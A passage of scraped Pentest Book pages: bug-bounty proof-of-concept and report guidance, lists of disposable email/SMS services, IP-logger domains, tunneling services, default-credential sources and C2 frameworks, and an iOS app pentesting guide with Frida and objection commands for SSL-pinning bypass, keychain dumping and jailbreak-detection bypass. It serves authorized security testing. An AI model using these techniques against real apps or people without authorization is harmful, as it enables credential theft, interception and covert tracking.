submit automatically, or design it so that it resembles a component from the target's page. Server-side request forgery The impact of a SSRF bug will vary — a non-exhaustive list of proof of concepts includes: * reading local files * obtaining cloud instance metadata * making requests to internal services (e.g. Redis) * accessing firewalled databases Local file read Make sure to only retrieve a harmless file. Check the program security policy as a specific file may be designated for testing. XML external entity processing Output random harmless data. Sub-domain takeover Claim the sub-domain discreetly and serve a harmless file on a hidden page. Do not serve content on the index page. [](https://www.pentest-book.com/others/bugbounty#good-report) Good Report ------------------------------------------------------------------------------ ### [](https://www.pentest-book.com/others/bugbounty#report-flow) Report flow ![](https://www.pentest-book.com/~gitbook/image?url=https%3A%2F%2F1729840239-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252F-M5x1LJiRQvXWpt04_ee%252Fuploads%252FUivxYDHrBWPt657b4oB2%252FUntitled%2520diagram-2025-03-14-131837.png%3Falt%3Dmedia%26token%3D51447d74-5000-4129-b6de-de42e8f857a0&width=768&dpr=3&quality=100&sign=bb79b02c&sv=2) [PreviousMaster assessment mindmaps](https://www.pentest-book.com/others/master-assessment-mindmap) [NextExploiting](https://www.pentest-book.com/others/exploiting) Last updated 1 year ago Was this helpful? * [https://github.com/bugcrowd/templates](https://www.pentest-book.com/others/bugbounty#https-github.com-bugcrowd-templates) * [Good PoC](https://www.pentest-book.com/others/bugbounty#good-poc) * [Good Report](https://www.pentest-book.com/others/bugbounty#good-report) * [Report flow](https://www.pentest-book.com/others/bugbounty#report-flow) Was this helpful? Copy # Writeups # https://github.com/devanshbatham/Awesome-Bugbounty-Writeups Copy # Bug bounty Report # Summary ... # Vulnerability details ... # Impact ... # Proof of concept ... # Browsers verified in ... # Mitigation ... --- # Random | Pentest Book For the complete documentation index, see [llms.txt](https://www.pentest-book.com/llms.txt) . This page is also available as [Markdown](https://www.pentest-book.com/others/dictionaries.md) . > **Note**: Some tools in this section may be deprecated or unmaintained. Check GitHub activity before relying on them. [](https://www.pentest-book.com/others/dictionaries#deprecated-unmaintained-tools-warning) Deprecated/Unmaintained Tools Warning ------------------------------------------------------------------------------------------------------------------------------------- Copy # āš ļø DEPRECATED/UNMAINTAINED TOOLS - Use alternatives: # twint (Twitter scraper) - DEPRECATED due to API changes # Alternative: snscrape, twikit, or official Twitter API # net-creds - Last update 2018 # Alternative: PCredz (active), Responder (for LLMNR/NBT-NS) # CMSeeK - Limited maintenance # Alternative: WhatWeb, Wappalyzer CLI, nuclei templates # PCredz - Works but unmaintained since 2020 # Alternative: Responder, Impacket tools # pwndb.py - Service discontinued # Alternative: h8mail, breach-parse, dehashed API # Some S3Scanner versions deprecated # Alternative: Use current version from https://github.com/sa7mon/S3Scanner [](https://www.pentest-book.com/others/dictionaries#aliases) Aliases ------------------------------------------------------------------------- [](https://www.pentest-book.com/others/dictionaries#temporary-emails) Temporary emails ------------------------------------------------------------------------------------------- [](https://www.pentest-book.com/others/dictionaries#temporary-sms-reception) Temporary SMS reception --------------------------------------------------------------------------------------------------------- [](https://www.pentest-book.com/others/dictionaries#free-sms-send) Free SMS send ------------------------------------------------------------------------------------- [](https://www.pentest-book.com/others/dictionaries#ip-loggers-services) Ip loggers services ------------------------------------------------------------------------------------------------- [](https://www.pentest-book.com/others/dictionaries#tunneling-services) Tunneling services ----------------------------------------------------------------------------------------------- [](https://www.pentest-book.com/others/dictionaries#default-credentials-lists) Default credentials lists ------------------------------------------------------------------------------------------------------------- [](https://www.pentest-book.com/others/dictionaries#c2) C2 --------------------------------------------------------------- [](https://www.pentest-book.com/others/dictionaries#others) Others ----------------------------------------------------------------------- ### [](https://www.pentest-book.com/others/dictionaries#av-bypasses-techniques) AV Bypasses techniques [https://cmepw.github.io/BypassAV/cmepw.github.io](https://cmepw.github.io/BypassAV/) [PreviousSubdomain tools review](https://www.pentest-book.com/others/subdomain-tools-review) [NextMaster assessment mindmaps](https://www.pentest-book.com/others/master-assessment-mindmap) Last updated 5 months ago Was this helpful? * [Deprecated/Unmaintained Tools Warning](https://www.pentest-book.com/others/dictionaries#deprecated-unmaintained-tools-warning) * [Aliases](https://www.pentest-book.com/others/dictionaries#aliases) * [Temporary emails](https://www.pentest-book.com/others/dictionaries#temporary-emails) * [Temporary SMS reception](https://www.pentest-book.com/others/dictionaries#temporary-sms-reception) * [Free SMS send](https://www.pentest-book.com/others/dictionaries#free-sms-send) * [Ip loggers services](https://www.pentest-book.com/others/dictionaries#ip-loggers-services) * [Tunneling services](https://www.pentest-book.com/others/dictionaries#tunneling-services) * [Default credentials lists](https://www.pentest-book.com/others/dictionaries#default-credentials-lists) * [C2](https://www.pentest-book.com/others/dictionaries#c2) * [Others](https://www.pentest-book.com/others/dictionaries#others) * [AV Bypasses techniques](https://www.pentest-book.com/others/dictionaries#av-bypasses-techniques) Was this helpful? Copy # Aliases alias cat="bat --style=grid" alias dockly='docker run -it --rm -v /var/run/docker.sock:/var/run/docker.sock lirantal/dockly' alias sniper='docker run -it xerosecurity/sn1per /bin/bash' alias myip='ip -br -c a && echo && curl ifconfig.me' alias lsla='colorls -lA --sd --gs --group-directories-first' alias gitleaks='docker run --rm --name=gitleaks zricethezav/gitleaks -v --pretty -r alias grp='git reset --hard origin/master && git pull' alias ccat='pygmentize -O style=monokai -f console256 -g' alias testssl='~/Escritorio/tools/testssl.sh/testssl.sh' alias nano='micro' alias scoutsuite='cd /home/user/tools/ScoutSuite && docker run --rm -t \ -v ~/.aws:/root/.aws:ro \ -v "$(pwd)/results:/opt/scoutsuite-report" \ scoutsuite:latest \ aws' alias services_running='systemctl list-units --type=service --state=running' alias pwndb='sudo python3 ~/PATH/pwndb/pwndb.py --target' alias s3scanner='sudo python3 ~/PATH/S3Scanner/s3scanner.py' alias flumberbuckets='sudo python3 ~/PATH/flumberboozle/flumberbuckets/flumberbuckets.py -p' function wordlists() { find ~/tools/payloads/ -type f -name "*$1*" } # https://github.com/foospidy/payloads Copy # https://github.com/s0md3v/ote ote init myusername https://www.guerrillamail.com/en/ https://10minutemail.com https://www.trash-mail.com/inbox/ https://www.mailinator.com http://www.yopmail.com/en https://generator.email https://en.getairmail.com http://www.throwawaymail.com/en https://maildrop.cc https://owlymail.com/en https://www.moakt.com https://tempail.com http://www.yopmail.com https://temp-mail.org/en https://www.mohmal.com http://od.obagg.com http://onedrive.readmail.net http://xkx.me https://t.odmail.cn https://www.emailondeck.com https://anonbox.net https://M.kuku.lu https://www.temp-mails.com/ http://deadfake.com/ https://www.sharklasers.com/ https://mytemp.email/ http://www.mintemail.com/ http://www.eyepaste.com/ mailsucker.net https://www.emailondeck.com/ https://getnada.com/ http://www.fakeinbox.com/ https://temp-mail.org/ https://www.tempmailaddress.com/ https://tempail.com/ https://tempm.com/ https://mailsac.com/ https://smailpro.com/ Copy Online SMS: https://sms-online.co/ Text anywhere: http://www.textanywhere.net/ Proovl: https://www.proovl.com/numbers Receive free SMS.NET: http://receivefreesms.net/ 5SIM: https://5sim.net/ Receive SMS Online.IN: http://receivesmsonline.in/ Receive SMS online.EU: http://receivesmsonline.eu/ Groovl: https://www.groovl.com/ 1S2U: https://1s2u.com/ Receive SMS online.ME: http://receivesmsonline.me/ Receive SMS: http://sms-receive.net/ Receive SMS Online.NET: https://www.receivesmsonline.net/ Receive free SMS: http://receivefreesms.com/ SMS Get: http://smsget.net/ Receive SMS online: https://receive-sms-online.com/ Receive an SMS: https://receive-a-sms.com/ Pinger: https://www.pinger.com/ 7 SIM.NET: http://7sim.net/ Send SMS now: http://www.sendsmsnow.com/ Temporary emails: https://www.temp-mails.com/ Vritty: https://virtty.com/ Free SMS code: https://freesmscode.com/ HS3X: http://hs3x.com/ Get a free SMS number: https://getfreesmsnumber.com/ See SMS: https://www.smsver.com/ SMS.SELLAITE: http://sms.sellaite.com/ Trash Mobile https://es.mytrashmobile.com/numeros Copy https://freebulksmsonline.com/ https://www.afreesms.com/ https://smsend.ru/ https://txtemnow.com/ http://www.sendanonymoussms.com/ http://www.textem.net/ http://www.txtdrop.com/ Copy ezstat.ru iplogger.org 2no.co iplogger.com iplogger.ru yip.su iplogger.co iplogger.info ipgrabber.ru ipgraber.ru iplis.ru 02ip.ru Copy https://localxpose.io/ https://serveo.net/ https://ngrok.com/ https://localtunnel.me/ https://openport.io/ https://pagekite.net/ Copy https://cirt.net/passwords https://github.com/danielmiessler/SecLists/tree/master/Passwords/Default-Credentials https://github.com/LandGrey/pydictor https://github.com/Mebus/cupp https://github.com/sc0tfree/mentalist https://github.com/ihebski/DefaultCreds-cheat-sheet # Check this tool https://github.com/noraj/pass-station/ Copy # Empire # https://github.com/BC-SECURITY/Empire # PoshC2 # https://github.com/nettitude/PoshC2 # Byob # https://github.com/malwaredllc/byob Copy # Dedupe wordlists # https://github.com/nil0x42/duplicut ./duplicut wordlist.txt -o clean-wordlist.txt # Printer attacks https://github.com/RUB-NDS/PRET # Malware online analysis https://app.any.run/ https://www.virustotal.com/gui/ https://tria.ge/ https://antiscan.me/ https://www.hybrid-analysis.com/ https://www.joesandbox.com/ # Malware offline analysis https://github.com/BlackSnufkin/LitterBox # Chrome extension analyzer https://thehackerblog.com/tarnish/# # Github update fork from original git remote add upstream https://github.com/[Original Owner Username]/[Original Repository].git git fetch upstream git checkout master git merge upstream/master git push # VPN attack framework https://github.com/klezVirus/vortex # Ip rotation https://gist.github.com/carlware/f02e14232177c18f33b5743bde916d8a # Redirect your browser traffic through VPS ssh -CqN -D 1337 root@YUOR.DEST.NEW.IP # Now configure your browser proxy to 1337 --- # iOS | Pentest Book For the complete documentation index, see [llms.txt](https://www.pentest-book.com/llms.txt) . This page is also available as [Markdown](https://www.pentest-book.com/mobile/ios.md) . > **Skill Level**: Intermediate to Advanced **Prerequisites**: Swift/ObjC basics, iOS security model [](https://www.pentest-book.com/mobile/ios#resources-and-references) Resources & References ------------------------------------------------------------------------------------------------ [https://martabyte.github.io/ios/hacking/2022/03/13/ios-hacking-en.htmlmartabyte.github.io](https://martabyte.github.io/ios/hacking/2022/03/13/ios-hacking-en.html) [![Logo](https://www.pentest-book.com/~gitbook/image?url=https%3A%2F%2Fframerusercontent.com%2Fimages%2FB2GsNutZRiCA8qwNefzudd6o480.png&width=20&dpr=3&quality=100&sign=80855b2b&sv=2)Modern iOS Pentesting: No Jailbreak Needed - Dvulndvuln.com](https://dvuln.com/blog/modern-ios-pentesting-no-jailbreak-needed) [![Logo](https://www.pentest-book.com/~gitbook/image?url=https%3A%2F%2Fmiro.medium.com%2Fv2%2Fresize%3Afill%3A304%3A304%2F10fd5c419ac61637245384e7099e131627900034828f4f386bdaa47a74eae156&width=20&dpr=3&quality=100&sign=8a320988&sv=2)Start your first iOS Application Pentest with me.. (Part- 1)Medium](https://kishorbalan.medium.com/start-your-first-ios-application-pentest-with-me-part-1-1692311f1902) [![Logo](https://www.pentest-book.com/~gitbook/image?url=https%3A%2F%2Finesmartins.github.io%2Fcontent%2Fimages%2F2021%2F08%2FScreenshot-2021-08-22-at-21.31.59.png&width=20&dpr=3&quality=100&sign=41b9c107&sv=2)MobSF "IPA Binary Analysis" | Step by StepInĆŖs Martins](https://inesmartins.github.io/mobsf-ipa-binary-analysis-step-by-step/index.html) [](https://www.pentest-book.com/mobile/ios#non-jailbreak-testing-recommended) Non-Jailbreak Testing (Recommended) ---------------------------------------------------------------------------------------------------------------------- ### [](https://www.pentest-book.com/mobile/ios#environment-setup) Environment Setup ### [](https://www.pentest-book.com/mobile/ios#ipa-acquisition-and-analysis) IPA Acquisition & Analysis ### [](https://www.pentest-book.com/mobile/ios#objection-non-jailbreak-runtime-manipulation) Objection (Non-Jailbreak Runtime Manipulation) ### [](https://www.pentest-book.com/mobile/ios#frida-scripting) Frida Scripting ### [](https://www.pentest-book.com/mobile/ios#proxy-setup-ssl-pinning-bypass) Proxy Setup (SSL Pinning Bypass) [](https://www.pentest-book.com/mobile/ios#jailbreak-testing) Jailbreak Testing ------------------------------------------------------------------------------------ ### [](https://www.pentest-book.com/mobile/ios#jailbroken-device-tools) Jailbroken Device Tools [](https://www.pentest-book.com/mobile/ios#static-analysis) Static Analysis -------------------------------------------------------------------------------- ### [](https://www.pentest-book.com/mobile/ios#binary-analysis) Binary Analysis ### [](https://www.pentest-book.com/mobile/ios#info.plist-analysis) Info.plist Analysis ### [](https://www.pentest-book.com/mobile/ios#file-system-analysis) File System Analysis [](https://www.pentest-book.com/mobile/ios#dynamic-analysis) Dynamic Analysis ---------------------------------------------------------------------------------- ### [](https://www.pentest-book.com/mobile/ios#runtime-inspection) Runtime Inspection ### [](https://www.pentest-book.com/mobile/ios#keychain-extraction) Keychain Extraction ### [](https://www.pentest-book.com/mobile/ios#jailbreak-detection-bypass) Jailbreak Detection Bypass [](https://www.pentest-book.com/mobile/ios#common-vulnerabilities) Common Vulnerabilities ---------------------------------------------------------------------------------------------- ### [](https://www.pentest-book.com/mobile/ios#insecure-data-storage) Insecure Data Storage ### [](https://www.pentest-book.com/mobile/ios#url-scheme-vulnerabilities) URL Scheme Vulnerabilities ### [](https://www.pentest-book.com/mobile/ios#clipboard-vulnerabilities) Clipboard Vulnerabilities ### [](https://www.pentest-book.com/mobile/ios#binary-protections-check) Binary Protections Check [](https://www.pentest-book.com/mobile/ios#tools-summary) Tools Summary ---------------------------------------------------------------------------- Tool Purpose Jailbreak Required Objection Runtime manipulation, patching No Frida Dynamic instrumentation No (with patched IPA) MobSF Static analysis No ipatool IPA download No Keychain-dumper Keychain extraction Yes SSL Kill Switch SSL pinning bypass Yes Cycript Runtime exploration Yes class-dump Header extraction No [](https://www.pentest-book.com/mobile/ios#ios-17-18-security-changes) iOS 17-18 Security Changes ------------------------------------------------------------------------------------------------------ ### [](https://www.pentest-book.com/mobile/ios#new-security-features) New Security Features ### [](https://www.pentest-book.com/mobile/ios#testing-considerations) Testing Considerations ### [](https://www.pentest-book.com/mobile/ios#ios-18-new-protections) iOS 18 New Protections ### [](https://www.pentest-book.com/mobile/ios#bypassing-new-protections) Bypassing New Protections ![](https://www.pentest-book.com/~gitbook/image?url=https%3A%2F%2F1729840239-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-legacy-files%2Fo%2Fassets%252F-M5x1LJiRQvXWpt04_ee%252F-MLvF5zjxdR7Yg0H0fNV%252F-MLvFJccFhVAHfJ86HeY%252Fimage.png%3Falt%3Dmedia%26token%3Da9eaf794-7a63-4a8f-a560-cfd0be9584e4&width=768&dpr=3&quality=100&sign=f3ed0a1f&sv=2) [PreviousAndroid](https://www.pentest-book.com/mobile/android) [NextBurp Suite](https://www.pentest-book.com/others/burp) Last updated 5 months ago Was this helpful? * [Resources & References](https://www.pentest-book.com/mobile/ios#resources-and-references) * [Non-Jailbreak Testing (Recommended)](https://www.pentest-book.com/mobile/ios#non-jailbreak-testing-recommended) * [Environment Setup](https://www.pentest-book.com/mobile/ios#environment-setup) * [IPA Acquisition & Analysis](https://www.pentest-book.com/mobile/ios#ipa-acquisition-and-analysis) * [Objection (Non-Jailbreak Runtime Manipulation)](https://www.pentest-book.com/mobile/ios#objection-non-jailbreak-runtime-manipulation) * [Frida Scripting](https://www.pentest-book.com/mobile/ios#frida-scripting) * [Proxy Setup (SSL Pinning Bypass)](https://www.pentest-book.com/mobile/ios#proxy-setup-ssl-pinning-bypass) * [Jailbreak Testing](https://www.pentest-book.com/mobile/ios#jailbreak-testing) * [Jailbroken Device Tools](https://www.pentest-book.com/mobile/ios#jailbroken-device-tools) * [Static Analysis](https://www.pentest-book.com/mobile/ios#static-analysis) * [Binary Analysis](https://www.pentest-book.com/mobile/ios#binary-analysis) * [Info.plist Analysis](https://www.pentest-book.com/mobile/ios#info.plist-analysis) * [File System Analysis](https://www.pentest-book.com/mobile/ios#file-system-analysis) * [Dynamic Analysis](https://www.pentest-book.com/mobile/ios#dynamic-analysis) * [Runtime Inspection](https://www.pentest-book.com/mobile/ios#runtime-inspection) * [Keychain Extraction](https://www.pentest-book.com/mobile/ios#keychain-extraction) * [Jailbreak Detection Bypass](https://www.pentest-book.com/mobile/ios#jailbreak-detection-bypass) * [Common Vulnerabilities](https://www.pentest-book.com/mobile/ios#common-vulnerabilities) * [Insecure Data Storage](https://www.pentest-book.com/mobile/ios#insecure-data-storage) * [URL Scheme Vulnerabilities](https://www.pentest-book.com/mobile/ios#url-scheme-vulnerabilities) * [Clipboard Vulnerabilities](https://www.pentest-book.com/mobile/ios#clipboard-vulnerabilities) * [Binary Protections Check](https://www.pentest-book.com/mobile/ios#binary-protections-check) * [Tools Summary](https://www.pentest-book.com/mobile/ios#tools-summary) * [iOS 17-18 Security Changes](https://www.pentest-book.com/mobile/ios#ios-17-18-security-changes) * [New Security Features](https://www.pentest-book.com/mobile/ios#new-security-features) * [Testing Considerations](https://www.pentest-book.com/mobile/ios#testing-considerations) * [iOS 18 New Protections](https://www.pentest-book.com/mobile/ios#ios-18-new-protections) * [Bypassing New Protections](https://www.pentest-book.com/mobile/ios#bypassing-new-protections) Was this helpful? Copy # Install Xcode command line tools xcode-select --install # Install Homebrew packages brew install libimobiledevice ideviceinstaller ios-deploy # Install Python tools pip3 install objection frida-tools # Check device connection idevice_id -l ideviceinfo Copy # Get IPA from App Store (decrypted) # https://github.com/majd/ipatool ipatool auth login -e email@example.com ipatool download -b com.app.bundleid -o app.ipa # Extract IPA unzip app.ipa -d extracted/ # Analyze with MobSF # https://github.com/MobSF/Mobile-Security-Framework-MobSF docker run -it --rm -p 8000:8000 opensecurity/mobile-security-framework-mobsf # Static analysis without device # https://github.com/AnyByte/app-check # https://github.com/nicnocquee/apple-mobile-provision-parser Copy # Patch IPA with Frida gadget (no jailbreak needed) objection patchipa --source app.ipa --codesign-signature "Apple Development: email@example.com" # Install patched IPA ios-deploy --bundle Payload/App.app # Connect to running app objection explore # Common objection commands ios hooking list classes ios hooking list class_methods ios hooking watch class ios hooking watch method " " --dump-args --dump-return # Disable SSL pinning ios sslpinning disable # Dump keychain ios keychain dump # List cookies ios cookies get # Dump filesystem ios plist cat ios nsuserdefaults get # Bypass jailbreak detection ios jailbreak disable # Search for strings in memory memory search "password" --string # Dump classes and methods ios hooking generate simple Copy // frida-script.js - SSL Pinning Bypass // https://codeshare.frida.re/@dki/ios10-ssl-bypass/ Java.perform(function() { // iOS SSL Pinning Bypass var resolver = new ApiResolver('objc'); resolver.enumerateMatches('*[* URLSession:didReceiveChallenge:completionHandler:]', { onMatch: function(match) { Interceptor.attach(match.address, { onEnter: function(args) { var dominated = ObjC.Object(args[4]); dominated.invoke('initWithDisposition:credential:', 0, null); } }); }, onComplete: function() {} }); }); // Run with: frida -U -f com.app.bundleid -l frida-script.js --no-pause Copy # Frida basics frida-ps -Ua # List running apps frida -U -f com.app.bundleid # Spawn and attach frida -U "App Name" # Attach to running # Useful Frida scripts # https://github.com/m0bilesecurity/Frida-Mobile-Scripts # https://codeshare.frida.re/ Copy # Install Burp CA on device # Settings > General > About > Certificate Trust Settings > Enable # For SSL pinning bypass (without jailbreak) # Use objection: ios sslpinning disable # Or patch the app with Frida gadget # Network interception with mitmproxy mitmproxy --mode regular --ssl-insecure # Charles Proxy setup # Enable SSL Proxying for specific hosts # Install Charles CA on device Copy # All about Jailbreak & iOS versions https://www.theiphonewiki.com/wiki/Jailbreak # OWASP MSTG https://github.com/OWASP/owasp-mstg # Jailbreak compatibility list https://docs.google.com/spreadsheets/d/11DABHIIqwYQKj1L83AK9ywk_hYMjEkcaxpIg6phbTf0/edit#gid=1014970938 # Checklist https://mobexler.com/checklist.htm#ios # Jailbreak tools # checkra1n - iPhone 5s though iPhone X, iOS 12.3+ # https://checkra.in/ checkra1n # unc0ver - https://unc0ver.dev/ # Taurine - https://taurine.app/ # palera1n - https://palera.in/ (iOS 15+) # 3UTools for Windows http://www.3u.com/ # Cydia Repositories # https://ryleylangus.com/repo # Liberty Bypass - Jailbreak detection bypass Copy # SSH to device (default: alpine) ssh root@device_ip # Install Frida on device # Add https://build.frida.re to Cydia sources # Install Frida from Cydia # SSL Kill Switch 2 # https://github.com/nabla-c0d3/ssl-kill-switch2 # Install .deb on device # Keychain Dumper # https://github.com/ptoomey3/Keychain-Dumper ./keychain-dumper # FLEXible - In-app debugging # Install from Cydia # Cycript - Runtime manipulation cycript -p cy# UIApp.keyWindow.rootViewController Copy # Get .ipa and extract unzip example.ipa cd Payload/App.app # Check encryption (should be cryptid 1) otool -l BINARY | grep -A 4 LC_ENCRYPTION_INFO # Check PIE (Position Independent Executable) otool -hv BINARY | grep PIE # Check ARC (Automatic Reference Counting) otool -Iv BINARY | grep objc_release # Check stack canaries otool -Iv BINARY | grep stack_chk # List dynamic dependencies otool -L BINARY # Dump classes and methods # https://github.com/DerekSelander/dsdump dsdump -a BINARY # Class-dump for Objective-C headers class-dump -H -o output/ BINARY # Swift class dump # https://github.com/nicolo-grazioli/swift-dump Copy # Using plutil plutil -p Info.plist # Check for sensitive configurations # App Transport Security exceptions grep -A 10 "NSAppTransportSecurity" Info.plist # URL schemes grep -A 5 "CFBundleURLSchemes" Info.plist # Exported UTIs grep -A 5 "UTExportedTypeDeclarations" Info.plist # Background modes grep -A 5 "UIBackgroundModes" Info.plist # https://scriptingosx.com/2016/11/editing-property-lists/ Copy # Interesting locations /private/var/mobile/Containers/Data/Application/{HASH}/ /private/var/containers/Bundle/Application/{HASH}/ /var/containers/Bundle/Application/{HASH} /var/mobile/Containers/Data/Application/{HASH} /var/mobile/Containers/Shared/AppGroup/{HASH} # SQLite databases find /var/mobile/Containers/Data/Application/ -name "*.db" 2>/dev/null find /var/mobile/Containers/Data/Application/ -name "*.sqlite" 2>/dev/null # Plist files find /var/mobile/Containers/Data/Application/ -name "*.plist" 2>/dev/null # Cache and logs ls -la /var/mobile/Containers/Data/Application/{HASH}/Library/Caches/ ls -la /var/mobile/Containers/Data/Application/{HASH}/tmp/ Copy # Dump decrypted IPA from device # https://github.com/AloneMonkey/frida-ios-dump python3 dump.py "App Name" # Manual IPA extraction (without launching app) ls -lahR /var/containers/Bundle/Application/ | grep -B 2 -i 'appname' scp -r root@127.0.0.1:/var/containers/Bundle/Application/{ID} LOCAL_PATH mkdir Payload cp -r appname.app/ Payload/ zip -r app.ipa Payload/ # Monitor logs idevicesyslog | grep "AppName" # Snapshot inspection (screenshot in memory) ls /var/mobile/Containers/Data/Application/{HASH}/Library/SplashBoard/Snapshots/ Copy # With Objection objection explore ios keychain dump ios keychain dump --json output.json # With keychain-dumper (jailbroken) ./keychain-dumper # Check keychain accessibility levels # kSecAttrAccessibleWhenUnlocked - Good # kSecAttrAccessibleAfterFirstUnlock - Okay # kSecAttrAccessibleAlways - Bad! Copy # Using Objection ios jailbreak disable # Using Liberty Lite (Cydia) # Enable for specific app # Using A-Bypass # https://repo.co.kr/ # Frida script for jailbreak bypass # https://codeshare.frida.re/@liangxiaoyi1024/ios-jailbreak-detection-bypass/ Copy # Check NSUserDefaults ios nsuserdefaults get # Check for cleartext in plist find . -name "*.plist" -exec grep -l "password\|token\|key" {} \; # Check SQLite databases sqlite3 database.db ".tables" sqlite3 database.db "SELECT * FROM users;" # Check for hardcoded credentials strings BINARY | grep -i "api\|key\|secret\|password\|token" Copy # List URL schemes cat Info.plist | grep -A 5 CFBundleURLSchemes # Test URL schemes # On device: Safari > myapp://test # Or programmatically # Check for deep link injection frida -U "AppName" -e 'ObjC.classes.UIApplication.sharedApplication().openURL_(ObjC.classes.NSURL.URLWithString_("myapp://inject"))' Copy # Monitor clipboard with Frida frida -U "AppName" -e 'ObjC.classes.UIPasteboard.generalPasteboard().string()' # Check if sensitive data copied to clipboard # Look for password fields with copy enabled Copy # Use MobSF or manual checks # PIE: otool -hv binary | grep PIE # ARC: otool -Iv binary | grep objc_release # Stack Canaries: otool -Iv binary | grep stack_chk # Encrypted: otool -l binary | grep cryptid # Missing protections = easier exploitation Copy # iOS 17+ Security Enhancements # ================================ # 1. Lockdown Mode Enhancements # - Blocks most message attachment types # - Disables JIT compilation in Safari # - Blocks incoming FaceTime from unknown contacts # - Blocks wired connections when locked # Cannot bypass without physical access and passcode # 2. App Privacy Enhancements # - Sensitive Content Analysis on-device # - Enhanced Link Tracking Protection # - Communication Safety expansions # 3. Passkey Improvements # - Automatic passkey upgrades from passwords # - Passkey sharing via AirDrop # - Cross-platform passkey sync Copy # iOS 17+ Proxy Setup # Safari requires additional trust for custom CA certificates # Settings → General → About → Certificate Trust Settings → Enable full trust # Lockdown Mode Detection # Check if lockdown mode is enabled frida -U "AppName" -e ' var mode = ObjC.classes.BMSystemContainer.currentSystemContainer().lockdownModeEnabled(); console.log("Lockdown Mode: " + mode); ' # iOS 18 Specific # Enhanced app sandboxing # Per-app network proxy settings possible # Improved keychain protection # SSL Pinning in iOS 17+ # App Transport Security more strictly enforced # Check ATS exceptions in Info.plist plutil -p Info.plist | grep -A 20 NSAppTransportSecurity # Many apps now use Certificate Transparency # Consider CT log bypass techniques Copy # Contact Key Verification # Prevents MITM on iMessage # Cannot intercept verified conversations # Secure Boot Improvements # Stronger chain of trust verification # SEP (Secure Enclave Processor) updates # App Intents & Shortcuts Privacy # More granular permissions for automation # Testing on iOS 18 # 1. Check for new entitlements in binary codesign -d --entitlements :- Payload/App.app/App 2>&1 # 2. Review privacy manifest requirements # Apps must declare data usage in PrivacyInfo.xcprivacy find . -name "PrivacyInfo.xcprivacy" -exec cat {} \; # 3. Required Reason APIs # Apps must declare why they use certain APIs # Fingerprinting APIs now require justification Copy # iOS 17+ Jailbreak Status # Check current jailbreak availability # Dopamine, Palera1n for A11 and earlier # No public jailbreak for A12+ on iOS 17+ # Non-Jailbreak Testing Focus # Objection + patched IPA remains primary method # Focus on static analysis when dynamic not possible # Frida Gadget Injection # Works without jailbreak objection patchipa --source app.ipa --codesign-signature "YOUR_SIGNATURE" # Runtime Manipulation # iOS 17+ has improved integrity checks # May need to bypass more integrity validations frida -U "AppName" -e ' Interceptor.attach(ObjC.classes.PKTrustSettings["- evaluateTrust:"].implementation, { onLeave: function(retval) { retval.replace(0x1); // Trust all } }); ' --- # Burp Suite | Pentest Book For the complete documentation index, see [llms.txt](https://www.pentest-book.com/llms.txt) . This page is also available as [Markdown](https://www.pentest-book.com/others/burp.md) . [](https://www.pentest-book.com/others/burp#burp-mcp--codex-cli) Burp MCP + Codex CLI ------------------------------------------------------------------------------------------ Everything is documented and updated at [https://github.com/six2dez/burp-mcp-agents](https://github.com/six2dez/burp-mcp-agents) This guide shows how to connect Burp Suite MCP Server to Codex CLI so that Codex can reason directly on your real HTTP traffic — no API keys, no scanning, no fuzzing. You end up with a reasoning engine wired directly into your interception stack. * * * ### [](https://www.pentest-book.com/others/burp#what-you-get) What you get • Passive vuln discovery • IDOR / auth bypass / SSRF / logic flaw detection • Report writing from real Burp evidence • No API keys • Full local traffic control * * * ### [](https://www.pentest-book.com/others/burp#id-1.-install-burp-mcp-server) 1\. Install Burp MCP Server Install MCP Server from Burp’s BApp Store. Once installed, open its tab and click: > Extract server proxy jar ![](https://www.pentest-book.com/~gitbook/image?url=https%3A%2F%2F1729840239-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252F-M5x1LJiRQvXWpt04_ee%252Fuploads%252FYkYavwSHIePBdSecaAqI%252Fimage.png%3Falt%3Dmedia%26token%3D5b05b334-837f-4646-9c82-29937ed519f3&width=300&dpr=3&quality=100&sign=8a60f80e&sv=2) This downloads: This is the stdio MCP bridge Codex uses. * * * ### [](https://www.pentest-book.com/others/burp#id-2.-configure-codex-mcp) 2\. Configure Codex MCP Edit: Append: * * * ### [](https://www.pentest-book.com/others/burp#id-3.-install-caddy-reverse-proxy) 3\. Install Caddy reverse proxy Burp MCP currently enforces strict Origin validation and rejects extra headers sent by Codex, which causes handshake failures [see more here](https://github.com/PortSwigger/mcp-server/issues/34) . We solve this with a local reverse proxy. Install Caddy: * * * ### [](https://www.pentest-book.com/others/burp#id-4.-create-the-caddyfile) 4\. Create the Caddyfile Create: Paste: * * * ### [](https://www.pentest-book.com/others/burp#id-5.-start-everything) 5\. Start everything Verify: You should see: ![](https://www.pentest-book.com/~gitbook/image?url=https%3A%2F%2F1729840239-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252F-M5x1LJiRQvXWpt04_ee%252Fuploads%252FHYWY0hSJEdBQeJkR5dEH%252Fimage.png%3Falt%3Dmedia%26token%3Dff860651-3d91-40c6-91dc-279fbae41dfa&width=768&dpr=3&quality=100&sign=4ecb9d73&sv=2) * * * ### [](https://www.pentest-book.com/others/burp#id-6.-test-it) 6\. Test it Examples: * * * ### [](https://www.pentest-book.com/others/burp#id-7.-one-command-launcher-optional) 7\. One-command launcher (optional) Add to your ~/.zshrc (check your paths first): Run: * * * [](https://www.pentest-book.com/others/burp#tips) Tips ----------------------------------------------------------- [](https://www.pentest-book.com/others/burp#proxy-options) Proxy options ----------------------------------------------------------------------------- Append something to the user-agent Match \`^User-Agent: (.\*)$\` Replace \`User-Agent: $1 BugBounty-Username\` ![](https://www.pentest-book.com/~gitbook/image?url=https%3A%2F%2F1729840239-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252F-M5x1LJiRQvXWpt04_ee%252Fuploads%252FBvEqx4LIJtZqDxK7quYL%252Fimage.png%3Falt%3Dmedia%26token%3D8b584f79-27c3-44b8-bd68-15f999334b3c&width=768&dpr=3&quality=100&sign=3dd46b28&sv=2) [](https://www.pentest-book.com/others/burp#preferred-extensions) Preferred extensions ------------------------------------------------------------------------------------------- 